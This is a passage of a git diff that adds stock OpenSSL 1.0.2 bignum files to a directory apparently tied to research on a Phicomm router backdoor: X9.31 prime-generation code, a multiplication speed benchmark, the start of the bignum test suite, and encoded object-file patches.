zlhDe=B^~M5`@Q|0-UJD@#8SPT`V7aN-MdQTShLs~6vS9-Q`6>fTdYk8is2Y)q~%ns
zqg%>Mne=43x_3zE(lE}TUPkViQpqHx8RK+vXI$#ul|;RGCyNdak^_D5bmwZsDY>U)
z0@xU5aBnC_OPzk>TrmDyE6L|3KHtQzn>c6UO{~7gyJGm+X5vqo^d%EtVB(8d-O-QR
z#P^!`LK8n};&?tr+|wq$$i(lOxY^I7DIc>R57?rh88g-AYxM6lH+~<37H-_%6BcgV
z$A=bf+&kjU>`qDX4(O%+Qr~5a`jb6zuaq2+h_^E?#fi5glOf(jZz`2c155WxNiV$V
zt1?nN@gAG+Ov~QB{@%W1zqFfpbq~p|*pB{qD#<eVf1L-+v4qwassR{^W-cDgS-JH!
z{49lrXWjtKECcLm^Du+Cu!uwBWvgMzFEDO>QP*1m)3?TdiTSju|5tlIi|=Fpjn1%t
z(EzMB;v0QEaARy%eb<_h#oo}x_Z3TJDKqI~_8vo#^+x>++yMiOZ?!+h>}xE^S?$}w
zw%qw0XNm(X5S||*!`?W*a<S3m1Ud!bSz`Ei3jYPL+9NAhs#EMjo`!X^Shhp(Z7OHa
OqhpYsQaAOr+W!L%T3M<9

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_x931p.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_x931p.c
new file mode 100644
index 0000000..6d76b12
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_x931p.c
@@ -0,0 +1,274 @@
+/* bn_x931p.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2005.
+ */
+/* ====================================================================
+ * Copyright (c) 2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <openssl/bn.h>
+
+/* X9.31 routines for prime derivation */
+
+/*
+ * X9.31 prime derivation. This is used to generate the primes pi (p1, p2,
+ * q1, q2) from a parameter Xpi by checking successive odd integers.
+ */
+
+static int bn_x931_derive_pi(BIGNUM *pi, const BIGNUM *Xpi, BN_CTX *ctx,
+                             BN_GENCB *cb)
+{
+    int i = 0;
+    if (!BN_copy(pi, Xpi))
+        return 0;
+    if (!BN_is_odd(pi) && !BN_add_word(pi, 1))
+        return 0;
+    for (;;) {
+        i++;
+        BN_GENCB_call(cb, 0, i);
+        /* NB 27 MR is specificed in X9.31 */
+        if (BN_is_prime_fasttest_ex(pi, 27, ctx, 1, cb))
+            break;
+        if (!BN_add_word(pi, 2))
+            return 0;
+    }
+    BN_GENCB_call(cb, 2, i);
+    return 1;
+}
+
+/*
+ * This is the main X9.31 prime derivation function. From parameters Xp1, Xp2
+ * and Xp derive the prime p. If the parameters p1 or p2 are not NULL they
+ * will be returned too: this is needed for testing.
+ */
+
+int BN_X931_derive_prime_ex(BIGNUM *p, BIGNUM *p1, BIGNUM *p2,
+                            const BIGNUM *Xp, const BIGNUM *Xp1,
+                            const BIGNUM *Xp2, const BIGNUM *e, BN_CTX *ctx,
+                            BN_GENCB *cb)
+{
+    int ret = 0;
+
+    BIGNUM *t, *p1p2, *pm1;
+
+    /* Only even e supported */
+    if (!BN_is_odd(e))
+        return 0;
+
+    BN_CTX_start(ctx);
+    if (!p1)
+        p1 = BN_CTX_get(ctx);
+
+    if (!p2)
+        p2 = BN_CTX_get(ctx);
+
+    t = BN_CTX_get(ctx);
+
+    p1p2 = BN_CTX_get(ctx);
+
+    pm1 = BN_CTX_get(ctx);
+
+    if (!bn_x931_derive_pi(p1, Xp1, ctx, cb))
+        goto err;
+
+    if (!bn_x931_derive_pi(p2, Xp2, ctx, cb))
+        goto err;
+
+    if (!BN_mul(p1p2, p1, p2, ctx))
+        goto err;
+
+    /* First set p to value of Rp */
+
+    if (!BN_mod_inverse(p, p2, p1, ctx))
+        goto err;
+
+    if (!BN_mul(p, p, p2, ctx))
+        goto err;
+
+    if (!BN_mod_inverse(t, p1, p2, ctx))
+        goto err;
+
+    if (!BN_mul(t, t, p1, ctx))
+        goto err;
+
+    if (!BN_sub(p, p, t))
+        goto err;
+
+    if (p->neg && !BN_add(p, p, p1p2))
+        goto err;
+
+    /* p now equals Rp */
+
+    if (!BN_mod_sub(p, p, Xp, p1p2, ctx))
+        goto err;
+
+    if (!BN_add(p, p, Xp))
+        goto err;
+
+    /* p now equals Yp0 */
+
+    for (;;) {
+        int i = 1;
+        BN_GENCB_call(cb, 0, i++);
+        if (!BN_copy(pm1, p))
+            goto err;
+        if (!BN_sub_word(pm1, 1))
+            goto err;
+        if (!BN_gcd(t, pm1, e, ctx))
+            goto err;
+        if (BN_is_one(t)
+            /*
+             * X9.31 specifies 8 MR and 1 Lucas test or any prime test
+             * offering similar or better guarantees 50 MR is considerably
+             * better.
+             */
+            && BN_is_prime_fasttest_ex(p, 50, ctx, 1, cb))
+            break;
+        if (!BN_add(p, p, p1p2))
+            goto err;
+    }
+
+    BN_GENCB_call(cb, 3, 0);
+
+    ret = 1;
+
+ err:
+
+    BN_CTX_end(ctx);
+
+    return ret;
+}
+
+/*
+ * Generate pair of paramters Xp, Xq for X9.31 prime generation. Note: nbits
+ * paramter is sum of number of bits in both.
+ */
+
+int BN_X931_generate_Xpq(BIGNUM *Xp, BIGNUM *Xq, int nbits, BN_CTX *ctx)
+{
+    BIGNUM *t;
+    int i;
+    /*
+     * Number of bits for each prime is of the form 512+128s for s = 0, 1,
+     * ...
+     */
+    if ((nbits < 1024) || (nbits & 0xff))
+        return 0;
+    nbits >>= 1;
+    /*
+     * The random value Xp must be between sqrt(2) * 2^(nbits-1) and 2^nbits
+     * - 1. By setting the top two bits we ensure that the lower bound is
+     * exceeded.
+     */
+    if (!BN_rand(Xp, nbits, 1, 0))
+        return 0;
+
+    BN_CTX_start(ctx);
+    t = BN_CTX_get(ctx);
+
+    for (i = 0; i < 1000; i++) {
+        if (!BN_rand(Xq, nbits, 1, 0))
+            return 0;
+        /* Check that |Xp - Xq| > 2^(nbits - 100) */
+        BN_sub(t, Xp, Xq);
+        if (BN_num_bits(t) > (nbits - 100))
+            break;
+    }
+
+    BN_CTX_end(ctx);
+
+    if (i < 1000)
+        return 1;
+
+    return 0;
+
+}
+
+/*
+ * Generate primes using X9.31 algorithm. Of the values p, p1, p2, Xp1 and
+ * Xp2 only 'p' needs to be non-NULL. If any of the others are not NULL the
+ * relevant parameter will be stored in it. Due to the fact that |Xp - Xq| >
+ * 2^(nbits - 100) must be satisfied Xp and Xq are generated using the
+ * previous function and supplied as input.
+ */
+
+int BN_X931_generate_prime_ex(BIGNUM *p, BIGNUM *p1, BIGNUM *p2,
+                              BIGNUM *Xp1, BIGNUM *Xp2,
+                              const BIGNUM *Xp,
+                              const BIGNUM *e, BN_CTX *ctx, BN_GENCB *cb)
+{
+    int ret = 0;
+
+    BN_CTX_start(ctx);
+    if (!Xp1)
+        Xp1 = BN_CTX_get(ctx);
+    if (!Xp2)
+        Xp2 = BN_CTX_get(ctx);
+
+    if (!BN_rand(Xp1, 101, 0, 0))
+        goto error;
+    if (!BN_rand(Xp2, 101, 0, 0))
+        goto error;
+    if (!BN_X931_derive_prime_ex(p, p1, p2, Xp, Xp1, Xp2, e, ctx, cb))
+        goto error;
+
+    ret = 1;
+
+ error:
+    BN_CTX_end(ctx);
+
+    return ret;
+
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_x931p.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_x931p.o
new file mode 100644
index 0000000000000000000000000000000000000000..ac2fef1cecb17d4848c5fe73c544f71e7f6955ea
GIT binary patch
literal 4760
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bnspeed.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bnspeed.c
new file mode 100644
index 0000000..e387fdf
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bnspeed.c
@@ -0,0 +1,232 @@
+/* unused */
+
+/* crypto/bn/bnspeed.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/* most of this code has been pilfered from my libdes speed.c program */
+
+#define BASENUM 1000000
+#undef PROG
+#define PROG bnspeed_main
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <signal.h>
+#include <string.h>
+#include <openssl/crypto.h>
+#include <openssl/err.h>
+
+#if !defined(OPENSSL_SYS_MSDOS) && (!defined(OPENSSL_SYS_VMS) || defined(__DECC)) && !defined(OPENSSL_SYS_MACOSX)
+# define TIMES
+#endif
+
+#ifndef _IRIX
+# include <time.h>
+#endif
+#ifdef TIMES
+# include <sys/types.h>
+# include <sys/times.h>
+#endif
+
+/*
+ * Depending on the VMS version, the tms structure is perhaps defined. The
+ * __TMS macro will show if it was.  If it wasn't defined, we should undefine
+ * TIMES, since that tells the rest of the program how things should be
+ * handled.  -- Richard Levitte
+ */
+#if defined(OPENSSL_SYS_VMS_DECC) && !defined(__TMS)
+# undef TIMES
+#endif
+
+#ifndef TIMES
+# include <sys/timeb.h>
+#endif
+
+#if defined(sun) || defined(__ultrix)
+# define _POSIX_SOURCE
+# include <limits.h>
+# include <sys/param.h>
+#endif
+
+#include <openssl/bn.h>
+#include <openssl/x509.h>
+
+/* The following if from times(3) man page.  It may need to be changed */
+#ifndef HZ
+# ifndef CLK_TCK
+#  ifndef _BSD_CLK_TCK_         /* FreeBSD hack */
+#   define HZ   100.0
+#  else                         /* _BSD_CLK_TCK_ */
+#   define HZ ((double)_BSD_CLK_TCK_)
+#  endif
+# else                          /* CLK_TCK */
+#  define HZ ((double)CLK_TCK)
+# endif
+#endif
+
+#undef BUFSIZE
+#define BUFSIZE ((long)1024*8)
+int run = 0;
+
+static double Time_F(int s);
+#define START   0
+#define STOP    1
+
+static double Time_F(int s)
+{
+    double ret;
+#ifdef TIMES
+    static struct tms tstart, tend;
+
+    if (s == START) {
+        times(&tstart);
+        return (0);
+    } else {
+        times(&tend);
+        ret = ((double)(tend.tms_utime - tstart.tms_utime)) / HZ;
+        return ((ret < 1e-3) ? 1e-3 : ret);
+    }
+#else                           /* !times() */
+    static struct timeb tstart, tend;
+    long i;
+
+    if (s == START) {
+        ftime(&tstart);
+        return (0);
+    } else {
+        ftime(&tend);
+        i = (long)tend.millitm - (long)tstart.millitm;
+        ret = ((double)(tend.time - tstart.time)) + ((double)i) / 1000.0;
+        return ((ret < 0.001) ? 0.001 : ret);
+    }
+#endif
+}
+
+#define NUM_SIZES       5
+static int sizes[NUM_SIZES] = { 128, 256, 512, 1024, 2048 };
+
+/*
+ * static int sizes[NUM_SIZES]={59,179,299,419,539};
+ */
+
+void do_mul(BIGNUM *r, BIGNUM *a, BIGNUM *b, BN_CTX *ctx);
+
+int main(int argc, char **argv)
+{
+    BN_CTX *ctx;
+    BIGNUM a, b, c;
+
+    ctx = BN_CTX_new();
+    BN_init(&a);
+    BN_init(&b);
+    BN_init(&c);
+
+    do_mul(&a, &b, &c, ctx);
+}
+
+void do_mul(BIGNUM *r, BIGNUM *a, BIGNUM *b, BN_CTX *ctx)
+{
+    int i, j, k;
+    double tm;
+    long num;
+
+    for (i = 0; i < NUM_SIZES; i++) {
+        num = BASENUM;
+        if (i)
+            num /= (i * 3);
+        BN_rand(a, sizes[i], 1, 0);
+        for (j = i; j < NUM_SIZES; j++) {
+            BN_rand(b, sizes[j], 1, 0);
+            Time_F(START);
+            for (k = 0; k < num; k++)
+                BN_mul(r, b, a, ctx);
+            tm = Time_F(STOP);
+            printf("mul %4d x %4d -> %8.3fms\n", sizes[i], sizes[j],
+                   tm * 1000.0 / num);
+        }
+    }
+
+    for (i = 0; i < NUM_SIZES; i++) {
+        num = BASENUM;
+        if (i)
+            num /= (i * 3);
+        BN_rand(a, sizes[i], 1, 0);
+        Time_F(START);
+        for (k = 0; k < num; k++)
+            BN_sqr(r, a, ctx);
+        tm = Time_F(STOP);
+        printf("sqr %4d x %4d -> %8.3fms\n", sizes[i], sizes[i],
+               tm * 1000.0 / num);
+    }
+
+    for (i = 0; i < NUM_SIZES; i++) {
+        num = BASENUM / 10;
+        if (i)
+            num /= (i * 3);
+        BN_rand(a, sizes[i] - 1, 1, 0);
+        for (j = i; j < NUM_SIZES; j++) {
+            BN_rand(b, sizes[j], 1, 0);
+            Time_F(START);
+            for (k = 0; k < 100000; k++)
+                BN_div(r, NULL, b, a, ctx);
+            tm = Time_F(STOP);
+            printf("div %4d / %4d -> %8.3fms\n", sizes[j], sizes[i] - 1,
+                   tm * 1000.0 / num);
+        }
+    }
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bntest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bntest.c
new file mode 100644
index 0000000..06662c5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bntest.c
@@ -0,0 +1,2085 @@
+/* crypto/bn/bntest.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ *
+ * Portions of the attached software ("Contribution") are developed by
+ * SUN MICROSYSTEMS, INC., and are contributed to the OpenSSL project.
+ *
+ * The Contribution is licensed pursuant to the Eric Young open source
+ * license provided above.
+ *
+ * The binary polynomial arithmetic software is originally written by
+ * Sheueling Chang Shantz and Douglas Stebila of Sun Microsystems Laboratories.
+ *
+ */
+
+/*
+ * Until the key-gen callbacks are modified to use newer prototypes, we allow
+ * deprecated functions for openssl-internal code
+ */
+#ifdef OPENSSL_NO_DEPRECATED
+# undef OPENSSL_NO_DEPRECATED
+#endif
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+#include "e_os.h"
+
+#include <openssl/bio.h>
+#include <openssl/bn.h>
+#include <openssl/rand.h>
+#include <openssl/x509.h>
+#include <openssl/err.h>
+
+const int num0 = 100;           /* number of tests */
+const int num1 = 50;            /* additional tests for some functions */
+const int num2 = 5;             /* number of tests for slow functions */
+
+int test_add(BIO *bp);
+int test_sub(BIO *bp);
+int test_lshift1(BIO *bp);
+int test_lshift(BIO *bp, BN_CTX *ctx, BIGNUM *a_);
+int test_rshift1(BIO *bp);
+int test_rshift(BIO *bp, BN_CTX *ctx);
+int test_div(BIO *bp, BN_CTX *ctx);
+int test_div_word(BIO *bp);
+int test_div_recp(BIO *bp, BN_CTX *ctx);
+int test_mul(BIO *bp);
+int test_sqr(BIO *bp, BN_CTX *ctx);
+int test_mont(BIO *bp, BN_CTX *ctx);
+int test_mod(BIO *bp, BN_CTX *ctx);
+int test_mod_mul(BIO *bp, BN_CTX *ctx);
+int test_mod_exp(BIO *bp, BN_CTX *ctx);
+int test_mod_exp_mont_consttime(BIO *bp, BN_CTX *ctx);
+int test_mod_exp_mont5(BIO *bp, BN_CTX *ctx);
+int test_exp(BIO *bp, BN_CTX *ctx);
+int test_gf2m_add(BIO *bp);
+int test_gf2m_mod(BIO *bp);
+int test_gf2m_mod_mul(BIO *bp, BN_CTX *ctx);
+int test_gf2m_mod_sqr(BIO *bp, BN_CTX *ctx);
+int test_gf2m_mod_inv(BIO *bp, BN_CTX *ctx);
+int test_gf2m_mod_div(BIO *bp, BN_CTX *ctx);
+int test_gf2m_mod_exp(BIO *bp, BN_CTX *ctx);
+int test_gf2m_mod_sqrt(BIO *bp, BN_CTX *ctx);
+int test_gf2m_mod_solve_quad(BIO *bp, BN_CTX *ctx);
+int test_kron(BIO *bp, BN_CTX *ctx);
+int test_sqrt(BIO *bp, BN_CTX *ctx);
+int rand_neg(void);
+static int results = 0;
+
+static unsigned char lst[] =
+    "\xC6\x4F\x43\x04\x2A\xEA\xCA\x6E\x58\x36\x80\x5B\xE8\xC9"
+    "\x9B\x04\x5D\x48\x36\xC2\xFD\x16\xC9\x64\xF0";
+
+static const char rnd_seed[] =
+    "string to make the random number generator think it has entropy";
+
+static void message(BIO *out, char *m)
+{
+    fprintf(stderr, "test %s\n", m);
+    BIO_puts(out, "print \"test ");
+    BIO_puts(out, m);
+    BIO_puts(out, "\\n\"\n");
+}
+
+int main(int argc, char *argv[])
+{
+    BN_CTX *ctx;
+    BIO *out;
+    char *outfile = NULL;
+
+    results = 0;
+
+    RAND_seed(rnd_seed, sizeof rnd_seed); /* or BN_generate_prime may fail */
+
+    argc--;
+    argv++;
+    while (argc >= 1) {
+        if (strcmp(*argv, "-results") == 0)
+            results = 1;
+        else if (strcmp(*argv, "-out") == 0) {
+            if (--argc < 1)
+                break;
+            outfile = *(++argv);
+        }
+        argc--;
+        argv++;
+    }
+
+    ctx = BN_CTX_new();
+    if (ctx == NULL)
+        EXIT(1);
+
